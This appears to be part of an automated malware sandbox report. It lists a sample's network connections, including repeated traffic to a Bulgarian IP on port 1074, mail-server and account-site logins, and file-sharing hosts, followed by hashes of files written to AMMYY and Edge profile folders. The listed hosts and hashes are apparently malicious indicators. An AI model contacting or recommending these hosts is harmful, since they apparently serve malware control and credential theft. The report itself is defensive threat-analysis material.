| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | imap.ziggo.nl | udp |
| NL | 84.116.6.3:993 | imap.ziggo.nl | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | imap.telenet.be | udp |
| BE | 195.130.132.14:993 | imap.telenet.be | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| US | 8.8.8.8:53 | 14.132.130.195.in-addr.arpa | udp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 194.49.94.152:50500 | tcp | |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | api.vk.com | udp |
| RU | 87.240.190.70:443 | api.vk.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | www.earthdatascape.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| IT | 62.149.128.45:80 | www.earthdatascape.com | tcp |
| US | 8.8.8.8:53 | www.yf168vip.com | udp |
| HK | 34.92.57.107:80 | www.yf168vip.com | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 45.128.149.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.190.240.87.in-addr.arpa | udp |
| RU | 87.240.190.70:443 | api.vk.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | api.crunchyroll.com | udp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| US | 104.18.34.202:443 | api.crunchyroll.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| RU | 87.240.190.70:443 | api.vk.com | tcp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | 202.34.18.104.in-addr.arpa | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| US | 188.114.97.0:443 | yip.su | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.click | udp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| MY | 111.90.146.230:80 | tcp | |
| US | 8.8.8.8:53 | sl.himanfast.com | udp |
| US | 8.8.8.8:53 | gobo25cl.top | udp |
| US | 8.8.8.8:53 | thecrazymonkey.org | udp |
| US | 8.8.8.8:53 | redirector.pm | udp |
| US | 188.114.97.0:80 | sl.himanfast.com | tcp |
| US | 172.67.197.19:80 | gobo25cl.top | tcp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| BG | 91.92.243.139:80 | 91.92.243.139 | tcp |
| US | 194.49.94.85:443 | redirector.pm | tcp |
| NL | 185.26.182.111:80 | net.geo.opera.com | tcp |
| US | 172.67.197.19:443 | gobo25cl.top | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 104.18.34.202:443 | api.crunchyroll.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | free.os.pl | udp |
| RU | 87.240.190.70:443 | api.vk.com | tcp |
| FR | 54.36.104.47:143 | free.os.pl | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 47.104.36.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.mountainhumanresource.com | udp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| NP | 202.51.74.192:80 | www.mountainhumanresource.com | tcp |
| US | 104.18.34.202:443 | api.crunchyroll.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| RU | 87.240.190.70:443 | api.vk.com | tcp |
| US | 8.8.8.8:53 | flyawayaero.net | udp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 172.67.197.19:80 | gobo25cl.top | tcp |
| US | 172.67.197.19:443 | gobo25cl.top | tcp |
| US | 172.67.216.81:443 | flyawayaero.net | tcp |
| US | 194.49.94.85:443 | redirector.pm | tcp |
| US | 8.8.8.8:53 | potatogoose.com | udp |
| US | 8.8.8.8:53 | 192.74.51.202.in-addr.arpa | udp |
| NL | 185.26.182.111:80 | net.geo.opera.com | tcp |
| US | 104.21.35.235:443 | potatogoose.com | tcp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| US | 8.8.8.8:53 | northmuyaspropertyinvestment.com | udp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 91.92.243.139:80 | 91.92.243.139 | tcp |
| TR | 78.135.105.12:443 | northmuyaspropertyinvestment.com | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 188.114.97.0:443 | sl.himanfast.com | tcp |
| US | 104.18.34.202:443 | api.crunchyroll.com | tcp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 87.240.190.70:443 | api.vk.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | mi.claro.com.pe | udp |
| US | 194.49.94.152:50500 | tcp | |
| US | 8.8.8.8:53 | api.steampowered.com | udp |
| US | 66.225.237.161:443 | mi.claro.com.pe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 23.222.49.98:80 | api.steampowered.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 104.18.34.202:443 | api.crunchyroll.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 35.244.161.158:80 | www.333vvs.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.253:80 | ewixgdb.ua | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| FR | 157.240.196.63:443 | i.instagram.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | imap.mail.be | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| GB | 212.3.242.82:993 | imap.mail.be | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 194.49.94.152:50500 | tcp | |
| US | 66.225.237.161:443 | mi.claro.com.pe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.instagram.com | udp |
| NL | 157.240.247.174:443 | www.instagram.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | www.ssongg12336.cfd | udp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| NL | 142.250.102.138:443 | s.youtube.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 104.18.34.202:443 | api.crunchyroll.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BE | 195.130.132.14:993 | imap.telenet.be | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| HK | 154.216.129.246:80 | www.nnxh.net | tcp |
| RU | 87.240.190.70:443 | api.vk.com | tcp |
| NL | 23.222.49.98:443 | api.steampowered.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 66.225.237.161:443 | mi.claro.com.pe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| NL | 23.222.49.98:80 | api.steampowered.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | outlook.office365.com | udp |
| US | 194.49.94.152:50500 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 52.97.176.34:993 | outlook.office365.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | www.the-roofer.lat | udp |
| DE | 64.190.62.22:80 | www.the-roofer.lat | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 104.18.34.202:443 | api.crunchyroll.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 34.176.97.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | autoupdate.geo.opera.com | udp |
| US | 8.8.8.8:53 | 22.62.190.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | desktop-netinstaller-sub.osp.opera.software | udp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | www.janenas.top | udp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | poczta.wp.pl | udp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| PL | 193.17.41.249:443 | poczta.wp.pl | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| NL | 82.145.216.20:443 | autoupdate.geo.opera.com | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 129.153.80.87:8855 | tcp | |
| US | 8.8.8.8:53 | jnb-efz.ms-acdc.office.com | udp |
| ZA | 52.98.18.34:443 | jnb-efz.ms-acdc.office.com | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | www.a0zu3im002.cfd | udp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 249.41.17.193.in-addr.arpa | udp |
| US | 194.49.94.152:50500 | tcp | |
| ZA | 52.98.18.34:443 | jnb-efz.ms-acdc.office.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 34.18.98.52.in-addr.arpa | udp |
| BG | 185.141.63.4:1074 | tcp | |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| NL | 82.145.216.20:443 | autoupdate.geo.opera.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | m-api.nexon.com | udp |
| JP | 54.92.86.54:443 | m-api.nexon.com | tcp |
| ZA | 52.98.18.34:443 | jnb-efz.ms-acdc.office.com | tcp |
| US | 104.18.34.202:443 | api.crunchyroll.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 91.194.2.86:80 | www.finebb.net | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | download.opera.com | udp |
| US | 8.8.8.8:53 | mail.be | udp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 54.86.92.54.in-addr.arpa | udp |
| NL | 82.145.216.24:443 | download.opera.com | tcp |
| GB | 212.3.242.82:143 | mail.be | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| ZA | 52.98.22.18:443 | jnb-efz.ms-acdc.office.com | tcp |
| ZA | 52.98.22.18:443 | jnb-efz.ms-acdc.office.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 24.216.145.82.in-addr.arpa | udp |
| FR | 157.240.196.63:443 | i.instagram.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HK | 34.92.57.107:80 | www.yf168vip.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| GB | 212.3.242.82:993 | mail.be | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 18.22.98.52.in-addr.arpa | udp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 194.49.94.152:50500 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | datastream.myvnc.com | udp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.248.169.48:80 | www.spacecargo.net | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | logowanie.interia.pl | udp |
| US | 8.8.8.8:53 | imap.kpnmail.nl | udp |
| PL | 217.74.65.74:443 | logowanie.interia.pl | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 129.153.80.87:8855 | tcp | |
| NL | 195.121.65.133:993 | imap.kpnmail.nl | tcp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 203.161.61.170:80 | www.tecverse.xyz | tcp |
| US | 8.8.8.8:53 | 74.65.74.217.in-addr.arpa | udp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| NL | 84.116.6.3:993 | imap.ziggo.nl | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | oauth.vk.com | udp |
| RU | 87.240.129.135:443 | oauth.vk.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 87.240.129.135:443 | oauth.vk.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | xo.nate.com | udp |
| KR | 203.226.254.20:443 | xo.nate.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | www.layar111.com | udp |
| US | 35.208.239.184:80 | www.layar111.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | 135.129.240.87.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | imap.op.pl | udp |
| PL | 213.180.142.218:993 | imap.op.pl | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | outlook.office365.com | udp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 40.99.205.50:993 | outlook.office365.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 218.142.180.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | imap.tele2.nl | udp |
| BG | 185.141.63.4:1074 | tcp |
Files
C:\ProgramData\AMMYY\settings3.bin
| MD5 | 4cb889e527b0d0781a17f6c2dd968129 |
| SHA1 | 6a6a55cd5604370660f1c1ad1025195169be8978 |
| SHA256 | 2658cd46dd49335e739cafa31ff2ec63f3315b65ecc171a0f7612713d3ac702b |
| SHA512 | 297d2c05d2ac950faeb519d3e7bc56ea9d9fcab65b5dfdbba2720be8eddc8b2d5ead3dc7c122b82d6937be6c2d7bb88872dd7b80961138571245fba381daac3f |
C:\ProgramData\AMMYY\hr3
| MD5 | 179282f5e407267e4bce1b11d33b20e7 |
| SHA1 | 9dc7cacb1a04489f4b8fd73a82eed8deb9aea4c5 |
| SHA256 | 827ea92c94d0d126114399bcdcc584b3dea63e4712a46295e862642350770fe8 |
| SHA512 | 434b538709289254d4e63731d614cf51de253d06e37307ee51d994caa3d21cc9d88030e1dfca63d324864cee22c38cec8fc25aac7750b687883683f12d45c69a |
C:\ProgramData\AMMYY\hr
| MD5 | c978bec938a2268ece330e75d666fd58 |
| SHA1 | 2b12027b3d5fa0c7d5234cbb2387c81a598f7cb3 |
| SHA256 | b9f62f1b4437238ddf655a8d4f25b3d9110716e2e4a7affc40da3b2dd19f7c99 |
| SHA512 | d49ce9ed9ca5a92ff5ffc1b305453cba0fb0d57d43f7d74335de5a10fa8cdc583a6e1a5cfdb98322541272292df035d3dad98d6ab63aaf955d96fa1ff78f5a0b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 0629525c94f6548880f5f3a67846755e |
| SHA1 | 40ef667fc04bb1c0ae4bf2c17ded88594f0f4423 |
| SHA256 | 812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee |
| SHA512 | f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa |
\??\pipe\LOCAL\crashpad_1196_MRHRVFNRLIMKUFDQ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c49108b5885bdd2c99dabc20d451d99d |
| SHA1 | 0c49047f593548d1d47230e7bf3db01118f656a1 |
| SHA256 | 645e74e43f2c07bc937e703eb8e60315c050f74033735c0b8747a9b82dd26d75 |
| SHA512 | 24a6d84240bfb86e8a991434dc1fe6c6f2a82e5b83cb59051ac052f3fc63f13d0d9c6410c998c93e07f927871ebad2db0e5a258c84967ee9d39ac035174091f1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | ff2036653f54740784764f634ef19530 |
| SHA1 | 17ca87c551f8956c6e65bad88158bf09b30d6e31 |
| SHA256 | 822aaaf427637870728509e88e49e3bc3a8d012e5bd7fb33c5290884e4b50afe |
| SHA512 | 2e17b9205079b1995915aeed08cedf254116687e77a8d41bb775ce07f52af07c07bfe5006744e9f9789ad979d91d152ab800c52528073295d3b2d20dfddacd29 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 32661c380a0ece3dffbf821ba45d5ad6 |
| SHA1 | 986409fc460a3f6a85572718f70f08ecc67c515c |
| SHA256 | 8584c468888b5b9190b20986f255925f8ba67f8d5d0d3646cb82cff41b5960f4 |
| SHA512 | 831c80c26350912fd97e8d2a4f51b7fea61dc642c0481daafdbde2df48d7cc23483be74cf5a9da468d5bc03856c055a6728d69df6d5c04afecbefd633faeedbc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | fd20981c7184673929dfcab50885629b |
| SHA1 | 14c2437aad662b119689008273844bac535f946c |
| SHA256 | 28b7a1e7b492fff3e5268a6cd480721f211ceb6f2f999f3698b3b8cbd304bb22 |
| SHA512 | b99520bbca4d2b39f8bedb59944ad97714a3c9b8a87393719f1cbc40ed63c5834979f49346d31072c4d354c612ab4db9bf7f16e7c15d6802c9ea507d8c46af75 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a5540f3a67620f980f6b676ece79a5d2 |
| SHA1 | bb42aa3913c9362f7dc8479ac538f3157bef202c |
| SHA256 | 83d1fc5944e97bec10e50131e963166a94b7151cfbdd5cba4de79eef85b25361 |
| SHA512 | 852cdcdcf53dab36f170238e083afcad792e37266c16f29be2abaf7facf0ae626aa54d19a5607afd3720de8149cc81ee8b4ee5ef0f16fdbb880485f8deee5113 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bd4a251bb92679b649e65da42f347855 |
| SHA1 | d0d815f097ecd94de25d261e9b54c25fb9325abf |
| SHA256 | 60b17d02c779ac5e52a7082088adce349c0d9ce9543cae5064e1388cc3012a4c |
| SHA512 | 853eeb9c8e6e4fc2122e3eefefbbadf6645ed5185fb88dc6f09f97bcfc4faf31fda983ceaf35215d10aeb0550616279d346fe581d4c160065c393743ea35b798 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 00a455d9d155394bfb4b52258c97c5e5 |
| SHA1 | 2761d0c955353e1982a588a3df78f2744cfaa9df |
| SHA256 | 45a13c77403533b12fbeeeb580e1c32400ca17a32e15caa8c8e6a180ece27fed |
| SHA512 | 9553f8553332afbb1b4d5229bbf58aed7a51571ab45cbf01852b36c437811befcbc86f80ec422f222963fa7dabb04b0c9ae72e9d4ff2eeb1e58cde894fbe234f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | fb70bf413686cb3e695f0c04cc3d7adf |
| SHA1 | c87eef4b91f6ec6b92d7cfb71b55599ae15b1a71 |
| SHA256 | 5a75d789dc90321a193e92a4da777e9e4fb0bc69984c9b5c5adf252345eb84e3 |
| SHA512 | 8b980965a82e4285a2dfc639a1d7be83217901330d170b0297d1746ce06acaf5384e919b4535c4a051d5a3fd4763c07e8dcac08a89eb21ea4416c32ff7719273 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe599282.TMP
| MD5 | ea4238e8d9cd8a707d542ffb0c773e56 |
| SHA1 | b30236741ab389da9cd23ac6ece8c51a7ac5bd56 |
| SHA256 | fc640b7fe3ab61e2678f41156dd08e14ab807d975b81ff46d332955ab3a61537 |
| SHA512 | a162fbfb46ed1884925d2bee9c2077050d82a1cc68976d73201738225e51aaae89aae03c8429f124b9c88d2d9dc54b053138b2f68aec48d76281e1ab9e75c217 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | d9f1525e2f2cdfbd8779f39dea1c0fca |
| SHA1 | a532e8aca0e9b8872de2d71c9c6819df7fc356a7 |
| SHA256 | 23ba0830096bb48d51f1fdf84ca739f5cea3094ad6b466e8fc13b8013a9342ce |
| SHA512 | 7d907fdbf3c7770e62029d9ea8c537699618f68aee7daf7e24e3923bff6ddcacf9bb2faff023106cbc96a1b5e5105c694e26b5df3f3ee10766c00d922d3d0ba2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 8a40f0b52203d8dd50609798845a16f3 |
| SHA1 | a161706e5e777f159dee9a2d8397a667676cd174 |
| SHA256 | a83ff328379c9de828ad460a5def36c6f6d84c666d9d2e48cfdfd1f3ce8a5b56 |
| SHA512 | 5b3924ac910931d50f8d927167928e17a22a898f3da7ccbd854515769ff65cd935fba3990d6a6859ce97d4095fd9545f6089182c736647a61917e3ea6cf7d869 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 98ff94e74be6e9a0a3ce95b93a99d5fc |
| SHA1 | f7404fd66920142b235c13c1f18b8845df1556c5 |
| SHA256 | dd028e2fcea8ed3ed29b952b888e8f015fc199bcbac215b1c4da1798411d6a72 |
| SHA512 | 735a4403de907ec84be1da26497b3ae8df2b994b8b83a7ed966bec9a050c74be397aa3ad192104c0340907e7cce6dbeef2945655d84bc0333b7a246aefbb1f1a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | b064202ed02b57bd741ec3ea95b336cd |
| SHA1 | 1744559c1992ba62ea230177ea4cd6650faf286b |
| SHA256 | 080f047a4fc8f1e693219926287ebeee6ebf9464258c7a6baeffac11318c15bf |
| SHA512 | 202a865075953712dc999f96505e5829149d66440ca2a37788714d75d31c7653de61bbee198ef67dbfe28b997f375223519c43e37e0a56f61cdb9363ca1cda03 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 5413bfd53006a8d25cabe51602bed883 |
| SHA1 | 09b6953cce1017d86ea7697f7ced830ab3dc6bb2 |
| SHA256 | 8b7b37fb2d8428f01cdf2ed9a70fdc6607bcd01ec26ece24166bae29dd5ef678 |
| SHA512 | 212f7fa165e3ba6de0db9e3ef0d99bc9343d619cf58740386fbece89459c28eea9c43be4b4d33cb2c683a1fbde1aae423593806abf7de4b7d0be3263d9c8bd77 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4b52f6f42388c5ae44a9776420b2fee9 |
| SHA1 | 2fdee310c6381e495a9d756ca7bd12958dafb5e5 |
| SHA256 | 9cf02e3e825214a733eb2f19b99fd03ec093089da68cd1dadc900d6d4a2c3189 |
| SHA512 | db35800a45136b6f314c838cfae3701888bae9899864a92146dea502f1d1dc8ed1119f28ca98bcbf9282f4e208f282f2bfa35e9566fe675e05935860206a38e2 |
C:\Users\Admin\Downloads\Unconfirmed 757511.crdownload
| MD5 | 84db47223e6adf32df20a25481027186 |
| SHA1 | 5f66c312eb78f7dcc4dc7232e735aef11226c5e2 |
